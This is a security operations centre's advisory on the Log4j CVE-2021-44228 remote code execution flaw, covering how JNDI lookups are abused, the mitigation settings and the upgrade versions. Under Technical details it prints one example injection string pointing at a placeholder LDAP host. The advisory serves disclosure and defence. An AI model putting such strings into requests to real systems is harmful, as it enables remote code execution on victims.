Advisory December 13, 2021

Log4j RCE 0-day (CVE-2021-44228) vulnerability advisory

Obrela SOC

On December 9 2021, a zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was disclosed publicly that results in remote code execution (RCE). Log4j 2 is an open source Java logging library developed by the Apache Foundation widely adopted in many applications and services. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Technical details

A malicious crafted string of can trigger an application to reach out to an external location if it is logged via the vulnerable instance of log4j. Threat actors may craft a special text in an HTTP User-Agent header or a simple POST form request, with the usual form: ${jndi:ldap://<malicious_entity_host>.com/resource

The log4j vulnerability resides in the parsing of this request and reaches the malicious host via the ‘Java Naming and Directory Interface’ (JNDI). Then Java code is expected to be executed on the victim from the hosted malicious services, resulting in the remote code execution.

Mitigation

From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath. Java 8u121 protects against remote code execution by defaulting “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false”.

Though the incomplete patch for the CVE-2021-44228 could be abused to craft a malicious input data resulting in a Denial of Service (DoS) attack leading to CVE-2021-45046. Therefore, for users requiring Java 8 or later, it is advisable to upgrade to the latest version of Log4j, 2.16.0 whereas for user requiring Java 7 to 2.12.2 when it becomes available.

Recommendation

It is highly recommended to update Log4j to the latest official version to patch this vulnerability. The teams of Obrela Security Industries remain vigilant and continue to monitor the activity.

Note: This article was updated on 16 December 2021 to add new mitigation details.